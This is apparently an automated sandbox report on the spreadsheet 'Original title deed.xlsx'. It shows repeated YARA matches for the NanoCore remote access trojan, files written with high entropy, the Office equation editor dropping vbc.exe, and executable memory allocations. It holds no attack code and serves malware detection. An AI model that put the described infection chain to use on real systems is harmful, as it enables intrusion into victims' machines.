Source: Yara match	File source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY
Source: Yara match	File source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE

Spam, unwanted Advertisements and Ransom Demands:

Writes many files with high entropy

Show sources

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297	Jump to dropped file

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

4_2_00403461

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00406925

4_2_00406925

Source: Original title deed.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
